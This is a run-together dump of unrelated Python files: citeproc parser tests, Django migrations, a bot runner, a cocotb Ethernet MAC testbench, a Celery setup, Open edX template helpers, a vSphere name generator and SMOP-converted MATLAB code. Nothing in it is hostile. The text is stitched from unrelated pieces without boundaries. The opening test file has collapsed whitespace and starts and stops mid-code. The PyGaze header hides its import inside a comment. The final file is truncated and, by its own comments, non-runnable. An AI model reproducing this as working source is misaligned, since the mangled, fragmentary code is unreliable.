""" If no abstract, assert blank """ del citeproc['abstract'] assert self.test_class._get_abstract(citeproc) == '' def test_get_abstract_escaping(self, citeproc): """ Must do some escaping, e.g. we sometimes get some jats tags """ # We wrap the current abstract into some jats expected = citeproc['abstract'] citeproc['abstract'] = r'<jats:p>{}<\/jats:p>'.format(expected) assert self.test_class._get_abstract(citeproc) == expected def test_get_affiliations(self, affiliations, citeproc): """ Must have the same length as citeproc['author'] and identical to list of affiliations """ r = self.test_class._get_affiliations(citeproc) assert len(r) == len(citeproc.get('author')) assert r == affiliations def test_get_affiliations_no_authors(self, citeproc): """ Must rais exception """ del citeproc['author'] with pytest.raises(CiteprocAuthorError): self.test_class._get_affiliations(citeproc) def test_get_authors(self, citeproc): """ The list of authors shall be a list of BareNames """ r = self.test_class._get_authors(citeproc) assert isinstance(r, list) for barename in r: assert isinstance(barename, BareName) def test_get_authors_empty_list(self, citeproc): """ The list of authors must not be empty """ citeproc['author'] = [] with pytest.raises(CiteprocAuthorError): self.test_class._get_authors(citeproc) def test_get_authors_no_list(self, citeproc): """ author in citeproc must be a list """ del citeproc['author'] with pytest.raises(CiteprocAuthorError): self.test_class._get_authors(citeproc) def test_get_authors_invalid_author(self, monkeypatch, citeproc): """ If 'None' is an entry, raise exception """ # We mock the function and let it return None, so that name_pairs is a list of None monkeypatch.setattr(self.test_class, '_convert_to_name_pair', lambda x: None) with pytest.raises(CiteprocAuthorError): self.test_class._get_authors(citeproc) def test_get_container(self, container_title, citeproc): """ Must return container title """ assert self.test_class._get_container(citeproc) 
== container_title def test_get_container_missing(self): """ Must return exception """ with pytest.raises(CiteprocContainerTitleError): self.test_class._get_container(dict()) def test_get_doi(self, citeproc): """ Must return the DOI """ assert self.test_class._get_doi(citeproc) == citeproc['DOI'] def test_get_doi_invalid(self): """ Must raise exception """ with pytest.raises(CiteprocDOIError): self.test_class._get_doi({'DOI' : 'spanish inquisition'}) def test_get_doi_missing(self): """ Must raise exception """ with pytest.raises(CiteprocDOIError): self.test_class._get_doi(dict()) @pytest.mark.parametrize('issn, expected', [('1234-5675', '1234-5675'), (['1234-5675', ], '1234-5675'), ([], '')]) def test_get_issn(self, citeproc, issn, expected): """ Must return the issn or '' """ citeproc['ISSN'] = issn assert self.test_class._get_issn(citeproc) == expected def test_get_issn_missing(self, citeproc): """ Must return '' """ del citeproc['ISSN'] assert self.test_class._get_issn(citeproc) == '' @pytest.mark.usefixtures('db', 'mock_alias_publisher_increment', 'mock_journal_find', 'mock_publisher_find') @pytest.mark.parametrize('journal', [Journal(publisher=Publisher()), None]) def test_get_oairecord_data(self, monkeypatch, container_title, issn, citeproc, journal): """ We do some assertions on the results, but relatively lax, as we test the called functions, too """ monkeypatch.setattr(Journal, 'find', lambda issn, title: journal) r = self.test_class._get_oairecord_data(citeproc) assert r['doi'] == citeproc['DOI'] assert r['description'] == citeproc['abstract'] assert r['identifier'] == doi_to_crossref_identifier(citeproc['DOI']) assert r['issn'] == issn assert r['issue'] == citeproc['issue'] assert r['journal'] == journal assert r['journal_title'] == container_title assert r['pages'] == citeproc['page'] assert r['pdf_url'] == '' # Is not OA assert r['pubdate'] == date(*citeproc['issued']['date-parts'][0]) assert r['publisher_name'] == citeproc['publisher'] assert 
r['pubtype'] == citeproc['type'] assert r['source'] == OaiSource.objects.get(identifier='crossref') assert r['splash_url'] == doi_to_url(citeproc['DOI']) assert r['volume'] == citeproc['volume'] @pytest.mark.usefixtures('db', 'mock_journal_find', 'mock_publisher_find') def test_get_oairecord_data_missing(self, monkeypatch, container_title, issn, citeproc): """ Some fields may be empty, namely those with a direct get call """ keys = ['abstract', 'issue', 'publisher', 'page', 'volume'] for k in keys: del citeproc[k] r = self.test_class._get_oairecord_data(citeproc) keys = ['description', 'issue', 'publisher_name', 'pages', 'volume'] for k in keys: assert r[k] == '' @pytest.mark.parametrize('orcid, expected', [({'ORCID' : '0000-0001-8187-9704'}, '0000-0001-8187-9704'), ({'ORCID' : '0000-0001-8187-9705'}, None), ({}, None)]) def test_get_orcid(self, orcid, expected): """ Must be valid or None """ assert self.test_class._get_orcid(orcid) == expected def test_get_orcids(self, orcids, citeproc): """ Must have the same length as citeproc['author'] and identical to list of orcid """ r = self.test_class._get_orcids(citeproc) assert len(r) == len(citeproc.get('author')) assert r == orcids def test_get_orcid_no_authors(self, citeproc): """ Must rais exception """ del citeproc['author'] with pytest.raises(CiteprocAuthorError): self.test_class._get_orcids(citeproc) def test_get_paper_data(self, affiliations, orcids, title, citeproc): """ We do some assertions on the results, but relatively lax, as we test the called functions, too """ r = self.test_class._get_paper_data(citeproc) assert r['affiliations'] == affiliations for a in r['author_names']: assert isinstance(a, BareName) assert r['orcids'] == orcids assert r['pubdate'] == date(*citeproc['issued']['date-parts'][0]) assert r['title'] == title @pytest.mark.parametrize('doi', [True, False]) @pytest.mark.parametrize('license', [True, False]) def test_get_pdf_url(self, monkeypatch, doi, license): """ Must return true
# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Runs the main function in detokenize.py."""

from pw_tokenizer import detokenize

# Thin entry-point module: delegates directly to the detokenizer CLI.
# Note that main() runs at import time, so this module is intended to be
# executed (e.g. `python -m ...`), never imported as a library.
detokenize.main()
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    """Create the OtherAuthor table on top of migration 0002_second."""

    dependencies = [("migrations", "0002_second")]

    operations = [
        # Field tuples are (column name, field instance); the explicit
        # AutoField supplies the primary key.
        migrations.CreateModel(
            name="OtherAuthor",
            fields=[
                ("id", models.AutoField(primary_key=True)),
                ("name", models.CharField(max_length=255)),
                ("slug", models.SlugField(null=True)),
                ("age", models.IntegerField(default=0)),
                ("silly_field", models.BooleanField(default=False)),
            ],
        ),
    ]
#!/usr/bin/env python3
"""ananas command-line runner: load bot classes named in a config file,
instantiate them, and keep them running until a termination signal."""
import os, sys, signal, argparse, configparser, traceback, time, importlib
from contextlib import closing

from ananas import PineappleBot
import ananas.default

# Add the cwd to the module search path so that we can load user bot classes
sys.path.append(os.getcwd())

# Bots instantiated from the config file; shared with the signal handler.
bots = []


def shutdown_all(signum, frame):
    """Signal handler: cleanly shut down every running bot, then exit."""
    for bot in bots:
        if bot.state == PineappleBot.RUNNING:
            bot.shutdown()
    sys.exit("Shutdown complete")


def main():
    parser = argparse.ArgumentParser(description="Pineapple command line interface.", prog="ananas")
    parser.add_argument("config", help="A cfg file to read bot configuration from.")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="Log more extensive messages for e.g. debugging purposes.")
    parser.add_argument("-i", "--interactive", action="store_true",
                        help="Use interactive prompts for e.g. mastodon login")
    args = parser.parse_args()
    prog = sys.argv[0]

    cfg = configparser.ConfigParser()
    # Bug fix: ConfigParser.read() never raises FileNotFoundError -- it
    # silently skips unreadable files and returns the list of files it did
    # parse.  Check that return value instead of catching an exception that
    # cannot occur.
    if not cfg.read(args.config):
        sys.exit("Couldn't open '{}', exiting.".format(args.config))

    for bot in cfg:
        if bot == "DEFAULT":
            continue
        if "class" not in cfg[bot]:
            print("{}: no class specified, skipping {}.".format(prog, bot))
            continue
        botclass = cfg[bot]["class"]
        module, _, botclass = botclass.rpartition(".")
        if module == "":
            print("{}: no module given in class name '{}', skipping {}.".format(prog, botclass, bot))
            # Bug fix: the original printed "skipping" but then fell through
            # and attempted the import with an empty module name anyway.
            continue
        try:
            # Hardening: the original exec()'d a string assembled from config
            # data, which executes arbitrary code from the config file.
            # importlib + getattr achieves the same load without exec.
            cls = getattr(importlib.import_module(module), botclass)
            bots.append(cls(args.config, name=bot,
                            interactive=args.interactive, verbose=args.verbose))
        except ModuleNotFoundError as e:
            print("{}: encountered the following error loading module {}:".format(prog, module))
            print("{}: the error was: {}".format(prog, e))
            print("{}: skipping {}!".format(prog, bot))
            continue
        except KeyboardInterrupt:
            sys.exit()
        except Exception as e:
            # Includes AttributeError when the class is missing from the module.
            print("{}: fatal exception loading bot {}: {}\n{}".format(prog, bot, repr(e), traceback.format_exc()))
            continue

    signal.signal(signal.SIGINT, shutdown_all)
    signal.signal(signal.SIGABRT, shutdown_all)
    signal.signal(signal.SIGTERM, shutdown_all)

    # Sleep forever; the signal handlers above perform the shutdown.
    try:
        while True:
            time.sleep(60)
    except KeyboardInterrupt:
        shutdown_all(None, None)


if __name__ == "__main__":
    main()
#!/usr/bin/env python
"""

Copyright (c) 2020 Alex Forencich

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.

"""

import itertools
import logging
import os

import cocotb_test.simulator

import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge
from cocotb.regression import TestFactory

from cocotbext.eth import GmiiFrame, GmiiPhy
from cocotbext.axi import AxiStreamBus, AxiStreamSource, AxiStreamSink


class TB:
    # Testbench harness for the eth_mac_1g_gmii_fifo DUT: drives a simulated
    # GMII PHY on the line side and AXI-Stream source/sink models on the
    # logic side.
    def __init__(self, dut, speed=1000e6):
        self.dut = dut

        self.log = logging.getLogger("cocotb.tb")
        self.log.setLevel(logging.DEBUG)

        # 8 ns period clocks (125 MHz) for both the GTX and logic domains.
        cocotb.start_soon(Clock(dut.gtx_clk, 8, units="ns").start())
        cocotb.start_soon(Clock(dut.logic_clk, 8, units="ns").start())

        # PHY model: first argument group is the DUT's TX pins (PHY RX side),
        # second group is the DUT's RX pins (PHY TX side).
        self.gmii_phy = GmiiPhy(dut.gmii_txd, dut.gmii_tx_er, dut.gmii_tx_en, dut.mii_tx_clk, dut.gmii_tx_clk,
            dut.gmii_rxd, dut.gmii_rx_er, dut.gmii_rx_dv, dut.gmii_rx_clk, speed=speed)

        self.axis_source = AxiStreamSource(AxiStreamBus.from_prefix(dut, "tx_axis"), dut.logic_clk, dut.logic_rst)
        self.axis_sink = AxiStreamSink(AxiStreamBus.from_prefix(dut, "rx_axis"), dut.logic_clk, dut.logic_rst)

        dut.ifg_delay.setimmediatevalue(0)

    async def reset(self):
        # Pulse both resets for two tx_clk cycles, then release.
        # NOTE(review): `sig <= val` is the deprecated cocotb assignment
        # syntax (modern code uses `sig.value = val`); left unchanged here.
        self.dut.gtx_rst.setimmediatevalue(0)
        self.dut.logic_rst.setimmediatevalue(0)
        await RisingEdge(self.dut.tx_clk)
        await RisingEdge(self.dut.tx_clk)
        self.dut.gtx_rst <= 1
        self.dut.logic_rst <= 1
        await RisingEdge(self.dut.tx_clk)
        await RisingEdge(self.dut.tx_clk)
        self.dut.gtx_rst <= 0
        self.dut.logic_rst <= 0
        await RisingEdge(self.dut.tx_clk)
        await RisingEdge(self.dut.tx_clk)

    def set_speed(self, speed):
        # No runtime speed switching for this DUT; speed is fixed at
        # construction time via the PHY model.
        pass


async def run_test_rx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=1000e6):
    # Line-to-logic direction: send Ethernet frames into the PHY RX side and
    # expect their payloads on the DUT's rx_axis stream.

    tb = TB(dut, speed)

    tb.gmii_phy.rx.ifg = ifg
    tb.dut.ifg_delay <= ifg

    tb.set_speed(speed)

    await tb.reset()

    # Allow time for the DUT to detect/report the link speed.
    for k in range(100):
        await RisingEdge(dut.rx_clk)

    # speed indication: 0 = 10M, 1 = 100M, 2 = 1000M
    if speed == 10e6:
        assert dut.speed == 0
    elif speed == 100e6:
        assert dut.speed == 1
    else:
        assert dut.speed == 2

    test_frames = [payload_data(x) for x in payload_lengths()]

    for test_data in test_frames:
        test_frame = GmiiFrame.from_payload(test_data)
        await tb.gmii_phy.rx.send(test_frame)

    # Frames must come out in order with no error flag set.
    for test_data in test_frames:
        rx_frame = await tb.axis_sink.recv()

        assert rx_frame.tdata == test_data
        assert rx_frame.tuser == 0

    assert tb.axis_sink.empty()

    await RisingEdge(dut.rx_clk)
    await RisingEdge(dut.rx_clk)


async def run_test_tx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=1000e6):
    # Logic-to-line direction: stream payloads into tx_axis and expect
    # well-formed Ethernet frames (valid FCS) from the PHY TX side.

    tb = TB(dut, speed)

    # NOTE(review): sets the PHY *rx* inter-frame gap even in the TX test,
    # mirroring run_test_rx -- confirm this is intentional.
    tb.gmii_phy.rx.ifg = ifg
    tb.dut.ifg_delay <= ifg

    tb.set_speed(speed)

    await tb.reset()

    for k in range(100):
        await RisingEdge(dut.rx_clk)

    if speed == 10e6:
        assert dut.speed == 0
    elif speed == 100e6:
        assert dut.speed == 1
    else:
        assert dut.speed == 2

    test_frames = [payload_data(x) for x in payload_lengths()]

    for test_data in test_frames:
        await tb.axis_source.send(test_data)

    for test_data in test_frames:
        rx_frame = await tb.gmii_phy.tx.recv()

        assert rx_frame.get_payload() == test_data
        assert rx_frame.check_fcs()
        assert rx_frame.error is None

    assert tb.gmii_phy.tx.empty()

    await RisingEdge(dut.tx_clk)
    await RisingEdge(dut.tx_clk)


def size_list():
    # Sweep 60..127 byte payloads, two larger sizes, then ten minimum-size
    # frames back to back.
    return list(range(60, 128)) + [512, 1514] + [60]*10


def incrementing_payload(length):
    # 0x00, 0x01, ... repeating pattern of the requested length.
    return bytearray(itertools.islice(itertools.cycle(range(256)), length))


def cycle_en():
    # 25% duty-cycle enable pattern (unused by the factories below).
    return itertools.cycle([0, 0, 0, 1])


# Register the parametrized RX/TX tests only when running under a simulator.
if cocotb.SIM_NAME:

    for test in [run_test_rx, run_test_tx]:

        factory = TestFactory(test)
        factory.add_option("payload_lengths", [size_list])
        factory.add_option("payload_data", [incrementing_payload])
        factory.add_option("ifg", [12])
        factory.add_option("speed", [1000e6, 100e6, 10e6])
        factory.generate_tests()


# cocotb-test

tests_dir = os.path.abspath(os.path.dirname(__file__))
rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl'))
lib_dir = os.path.abspath(os.path.join(rtl_dir, '..', 'lib'))
axis_rtl_dir = os.path.abspath(os.path.join(lib_dir, 'axis', 'rtl'))


def test_eth_mac_1g_gmii_fifo(request):
    # pytest entry point: compile the RTL and launch the cocotb tests above
    # through cocotb-test.
    dut = "eth_mac_1g_gmii_fifo"
    module = os.path.splitext(os.path.basename(__file__))[0]
    toplevel = dut

    verilog_sources = [
        os.path.join(rtl_dir, f"{dut}.v"),
        os.path.join(rtl_dir, "eth_mac_1g_gmii.v"),
        os.path.join(rtl_dir, "gmii_phy_if.v"),
        os.path.join(rtl_dir, "ssio_sdr_in.v"),
        os.path.join(rtl_dir, "ssio_sdr_out.v"),
        os.path.join(rtl_dir, "oddr.v"),
        os.path.join(rtl_dir, "eth_mac_1g.v"),
        os.path.join(rtl_dir, "axis_gmii_rx.v"),
        os.path.join(rtl_dir, "axis_gmii_tx.v"),
        os.path.join(rtl_dir, "lfsr.v"),
        os.path.join(axis_rtl_dir, "axis_adapter.v"),
        os.path.join(axis_rtl_dir, "axis_async_fifo.v"),
        os.path.join(axis_rtl_dir, "axis_async_fifo_adapter.v"),
    ]

    # Module parameters; several are derived so they stay mutually consistent.
    parameters = {}

    parameters['AXIS_DATA_WIDTH'] = 8
    parameters['AXIS_KEEP_ENABLE'] = int(parameters['AXIS_DATA_WIDTH'] > 8)
    parameters['AXIS_KEEP_WIDTH'] = parameters['AXIS_DATA_WIDTH'] // 8
    parameters['ENABLE_PADDING'] = 1
    parameters['MIN_FRAME_LENGTH'] = 64
    parameters['TX_FIFO_DEPTH'] = 16384
    parameters['TX_FRAME_FIFO'] = 1
    parameters['TX_DROP_OVERSIZE_FRAME'] = parameters['TX_FRAME_FIFO']
    parameters['TX_DROP_BAD_FRAME'] = parameters['TX_DROP_OVERSIZE_FRAME']
    parameters['TX_DROP_WHEN_FULL'] = 0
    parameters['RX_FIFO_DEPTH'] = 16384
    parameters['RX_FRAME_FIFO'] = 1
    parameters['RX_DROP_OVERSIZE_FRAME'] = parameters['RX_FRAME_FIFO']
    parameters['RX_DROP_BAD_FRAME'] = parameters['RX_DROP_OVERSIZE_FRAME']
    parameters['RX_DROP_WHEN_FULL'] = parameters['RX_DROP_OVERSIZE_FRAME']

    # Parameters are also exported to the simulation environment.
    extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()}

    sim_build = os.path.join(tests_dir, "sim_build",
        request.node.name.replace('[', '-').replace(']', ''))

    cocotb_test.simulator.run(
        python_search=[tests_dir],
        verilog_sources=verilog_sources,
        toplevel=toplevel,
        module=module,
        parameters=parameters,
        sim_build=sim_build,
        extra_env=extra_env,
    )
# -*- coding: utf-8 -*-
from celery import Celery

from server import config

"""
Celery configuration module.
"""


def make_celery(app):
    """
    Build a Celery instance bound to the given Flask *app*.

    Every task runs inside the Flask application context, so tasks can use
    app-bound extensions just like request handlers.  Pattern taken from
    http://flask.pocoo.org/docs/0.12/patterns/celery/
    """
    celery_app = Celery(
        app.import_name,
        backend=config.CELERY_RESULT_BACKEND,
        broker=config.CELERY_BROKER_URL,
    )
    celery_app.conf.update(app.config)

    base_task = celery_app.Task

    class ContextTask(base_task):
        abstract = True

        def __call__(self, *call_args, **call_kwargs):
            # Push the Flask app context around every task invocation.
            with app.app_context():
                return base_task.__call__(self, *call_args, **call_kwargs)

    celery_app.Task = ContextTask
    return celery_app
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-09-15 15:28
# Converts Silo.workflowlevel1 from a single ForeignKey into a
# ManyToManyField, and tightens the related FK definitions.
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('silo', '0029_auto_20170915_0810'),
    ]

    operations = [
        # The old FK column must be dropped before a field with the same
        # name can be re-added as a many-to-many relation.
        migrations.RemoveField(
            model_name='silo',
            name='workflowlevel1',
        ),
        # NOTE(review): `null=True` has no effect on ManyToManyField
        # (Django system-check warning fields.W340); fixing it requires a
        # matching change on the model, so it is only flagged here.
        migrations.AddField(
            model_name='silo',
            name='workflowlevel1',
            field=models.ManyToManyField(blank=True, null=True, to='silo.WorkflowLevel1'),
        ),
        migrations.AlterField(
            model_name='tolauser',
            name='workflowlevel1',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='silo.WorkflowLevel1'),
        ),
        migrations.AlterField(
            model_name='workflowlevel2',
            name='workflowlevel1',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='silo.WorkflowLevel1'),
        ),
    ]
# Copyright (c) 2008 Mikeal Rogers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# NOTE(review): this module is Python 2 only (`urlparse` import, `unicode`
# builtin, dict `viewkeys`); porting to Python 3 would require changes here.

import logging
from urlparse import urljoin

from django.http import HttpResponse
from django.template import Context

from edxmako import lookup_template
from edxmako.request_context import get_template_request_context
from django.conf import settings
from django.core.urlresolvers import reverse
from openedx.core.djangoapps.theming.helpers import get_template_path, is_request_in_themed_site
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers

log = logging.getLogger(__name__)


def marketing_link(name):
    """Returns the correct URL for a link to the marketing site
    depending on if the marketing site is enabled

    Since the marketing site is enabled by a setting, we have two
    possible URLs for certain links. This function is to decides
    which URL should be provided.

    Arguments:
        name: key into settings.MKTG_URLS / settings.MKTG_URL_LINK_MAP.

    Returns the resolved URL string, or '#' when no link is configured.
    """
    # link_map maps URLs from the marketing site to the old equivalent on
    # the Django site
    link_map = settings.MKTG_URL_LINK_MAP
    # Site configuration may override both the feature flag and the URL map.
    enable_mktg_site = configuration_helpers.get_value(
        'ENABLE_MKTG_SITE',
        settings.FEATURES.get('ENABLE_MKTG_SITE', False)
    )
    marketing_urls = configuration_helpers.get_value(
        'MKTG_URLS',
        settings.MKTG_URLS
    )

    if enable_mktg_site and name in marketing_urls:
        # special case for when we only want the root marketing URL
        if name == 'ROOT':
            return marketing_urls.get('ROOT')
        # Using urljoin here allows us to enable a marketing site and set
        # a site ROOT, but still specify absolute URLs for other marketing
        # URLs in the MKTG_URLS setting
        # e.g. urljoin('http://marketing.com', 'http://open-edx.org/about')
        # >>> 'http://open-edx.org/about'
        return urljoin(marketing_urls.get('ROOT'), marketing_urls.get(name))
    # only link to the old pages when the marketing site isn't on
    elif not enable_mktg_site and name in link_map:
        # don't try to reverse disabled marketing links
        if link_map[name] is not None:
            return reverse(link_map[name])
    else:
        log.debug("Cannot find corresponding link for name: %s", name)
        return '#'


def is_any_marketing_link_set(names):
    """
    Returns a boolean if any given named marketing links are configured.
    """
    return any(is_marketing_link_set(name) for name in names)


def is_marketing_link_set(name):
    """
    Returns a boolean if a given named marketing link is configured.

    Checks MKTG_URLS when the marketing site is enabled, otherwise the
    Django-side MKTG_URL_LINK_MAP.
    """
    enable_mktg_site = configuration_helpers.get_value(
        'ENABLE_MKTG_SITE',
        settings.FEATURES.get('ENABLE_MKTG_SITE', False)
    )
    marketing_urls = configuration_helpers.get_value(
        'MKTG_URLS',
        settings.MKTG_URLS
    )

    if enable_mktg_site:
        return name in marketing_urls
    else:
        return name in settings.MKTG_URL_LINK_MAP


def marketing_link_context_processor(request):
    """
    A django context processor to give templates access to marketing URLs

    Returns a dict whose keys are the marketing link names usable with the
    marketing_link method (e.g. 'ROOT', 'CONTACT', etc.) prefixed with
    'MKTG_URL_' and whose values are the corresponding URLs as computed by
    the marketing_link method.
    """
    marketing_urls = configuration_helpers.get_value(
        'MKTG_URLS',
        settings.MKTG_URLS
    )

    # Union of both configured key sets so every known link gets an entry.
    # (viewkeys is Python 2 only.)
    return dict(
        [
            ("MKTG_URL_" + k, marketing_link(k))
            for k in (
                settings.MKTG_URL_LINK_MAP.viewkeys() |
                marketing_urls.viewkeys()
            )
        ]
    )


def footer_context_processor(request):  # pylint: disable=unused-argument
    """
    Checks the site name to determine whether to use the edX.org footer or
    the Open Source Footer.
    """
    return dict(
        [
            ("IS_REQUEST_IN_MICROSITE", is_request_in_themed_site())
        ]
    )


def render_to_string(template_name, dictionary, context=None, namespace='main', request=None):
    """
    Render a Mako template to as a string.

    The following values are available to all templates:
        settings: the django settings object
        EDX_ROOT_URL: settings.EDX_ROOT_URL
        marketing_link: The :func:`marketing_link` function
        is_any_marketing_link_set: The :func:`is_any_marketing_link_set` function
        is_marketing_link_set: The :func:`is_marketing_link_set` function

    Arguments:
        template_name: The name of the template to render. Will be loaded
            from the template paths specified in configuration.
        dictionary: A dictionary of variables to insert into the template
            during rendering.
        context: A :class:`~django.template.Context` with values to make
            available to the template.
        namespace: The Mako namespace to find the named template in.
        request: The request to use to construct the RequestContext for
            rendering this template. If not supplied, the current request
            will be used.
    """
    # Resolve theming overrides for the template path.
    template_name = get_template_path(template_name)

    context_instance = Context(dictionary)
    # add dictionary to context_instance
    context_instance.update(dictionary or {})

    # collapse context_instance to a single dictionary for mako
    context_dictionary = {}
    context_instance['settings'] = settings
    context_instance['EDX_ROOT_URL'] = settings.EDX_ROOT_URL
    context_instance['marketing_link'] = marketing_link
    context_instance['is_any_marketing_link_set'] = is_any_marketing_link_set
    context_instance['is_marketing_link_set'] = is_marketing_link_set

    # In various testing contexts, there might not be a current request context.
    request_context = get_template_request_context(request)
    if request_context:
        # Iterating a django Context yields its layered dicts; later layers
        # override earlier ones in context_dictionary.
        for item in request_context:
            context_dictionary.update(item)
    for item in context_instance:
        context_dictionary.update(item)
    if context:
        context_dictionary.update(context)

    # "Fix" CSRF token by evaluating the lazy object
    KEY_CSRF_TOKENS = ('csrf_token', 'csrf')
    for key in KEY_CSRF_TOKENS:
        if key in context_dictionary:
            context_dictionary[key] = unicode(context_dictionary[key])

    # fetch and render template
    template = lookup_template(namespace, template_name)
    return template.render_unicode(**context_dictionary)


def render_to_response(template_name, dictionary=None, context_instance=None, namespace='main', request=None, **kwargs):
    """
    Returns a HttpResponse whose content is filled with the result of
    calling lookup.get_template(args[0]).render with the passed arguments.
    """
    # NOTE(review): `context_instance` is forwarded into render_to_string's
    # `context` parameter (third positional) -- the names differ; confirm
    # this is the intended mapping.
    dictionary = dictionary or {}
    return HttpResponse(render_to_string(template_name, dictionary, context_instance, namespace, request), **kwargs)
import random
import re
import vsphere_inventory as vsphere
from os.path import join, dirname

try:
    import json
except ImportError:
    import simplejson as json


def readNamesFrom(filepath):
    """Return the lines of *filepath* as a list (trailing newlines kept;
    callers strip them)."""
    with open(filepath) as f:
        return f.readlines()


def randomName(lefts, rights):
    """Build a 'left-right' name from one random entry of each word list."""
    left = random.choice(lefts).rstrip()
    right = random.choice(rights).rstrip()
    return left + '-' + right


def nodeExists(knownNames, name):
    """Return True if *name* matches a known node, either exactly or as the
    short hostname of an FQDN (e.g. 'foo' matches 'foo.example.com').

    re.escape guards against regex metacharacters leaking in from the word
    lists; the raw string fixes the invalid '\\.' escape the original relied
    on (a DeprecationWarning on modern Python).
    """
    pattern = re.compile(re.escape(name) + r'(\.|$)')
    return any(pattern.match(n) for n in knownNames)


def generateName(knownNames):
    """Generate a random name not already present in *knownNames*.

    Tries up to 10 random combinations; exits the process with code 2 if
    every attempt collides.
    """
    leftSides = readNamesFrom(join(dirname(__file__), 'names', 'lefts.txt'))
    rightSides = readNamesFrom(join(dirname(__file__), 'names', 'rights.txt'))
    for i in range(10):
        name = randomName(leftSides, rightSides)
        if not nodeExists(knownNames, name):
            return name
    else:
        # for/else: only reached when the loop exhausts without returning
        print('Failed to generate a new, unique, name after 10 attempts')
        exit(2)


if __name__ == '__main__':
    parser = vsphere.argparser()
    args = parser.parse_args()
    vs = vsphere.vsphereConnect(args.server, args.user, args.password)
    vimSession = vsphere.vimLogin(vs)
    vms = vsphere.vmsAtPath(vs, vimSession, args.path)
    vmList = [vm['hostname'] for vm in vms]
    newName = generateName(vmList)
    print(newName)
# -*- coding: utf-8 -*- # # This file is part of PyGaze - the open-source toolbox for eye tracking # # PyGaze is a Python module for easily creating gaze contingent experiments # or other software (as well as non-gaze contingent experiments/software) # Copyright (C) 2012-2013 Edwin S. Dalmaijer # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License #
along with this program. If not, see <http://www.gnu.org/licenses/> from pygaze.sound import Sound
# Autogenerated with SMOP version 0.23
# main.py ../../assessing-mininet/MATLAB/load_function.m ../../assessing-mininet/MATLAB/process_complete_test_set.m ../../assessing-mininet/MATLAB/process_single_testfile.m ../../assessing-mininet/MATLAB/ProcessAllLogsMain.m
#
# NOTE(review): This module is SMOP machine output and is NOT runnable as-is.
# It references MATLAB shims that are never imported here (mean, std, cat,
# sort, round_, matlabarray, copy, plot, subplot, errorbar, title, xlabel,
# ylabel, axis, grid, figure, set_, saveas, close, clear, diff, hist) --
# presumably supplied by smop.core plus a matplotlib bridge; confirm against
# the MATLAB sources listed above.  Several names (ii, bitrate_interval,
# bitrate, delay, jitter, pktloss) are also used before assignment, so both
# functions raise NameError if actually executed.
from __future__ import division
from numpy import arange

def strcat(*args):
    # MATLAB strcat equivalent: concatenate all string arguments.
    return ''.join(args)

def load_octave_decoded_file_as_matrix(file_name):
    # Parse a space-separated numeric log file into a list of rows.
    # NOTE(review): on Python 3, map() yields one-shot iterators, not lists;
    # the `from __future__ import division` suggests this targets Python 2,
    # where each row is a real list -- confirm the intended interpreter.
    with open(file_name, 'r') as f:
        return [ map(float,line.strip().split(' ')) for line in f ]

def get_test_bitrate(crosstraffic):
    # The x-axis of the summary plots: the bitrates each test was run at,
    # which depend on whether cross-traffic was present.
    if crosstraffic:
        return arange(4,6,0.25)
    else:
        return arange(8,12,0.5)

def process_complete_test_set(file_names,output_format,crosstraffic):
    """Aggregate per-test statistics from decoded log files and save a
    3-panel (throughput/delay/jitter) overview figure.

    NOTE(review): broken as generated -- `ii` is never defined or
    incremented in the loop, the `mean_*`/`std_dev_*` lists are indexed
    while empty, and `bitrate_interval` is undefined.
    """
    from glob import glob
    overview_img_file=strcat('overview.',output_format)
    # Per-file aggregate statistics, one slot per processed log file.
    mean_bitrate=[]
    std_dev_bitrate=[]
    mean_delay=[]
    std_dev_delay=[]
    mean_jitter=[]
    std_dev_jitter=[]
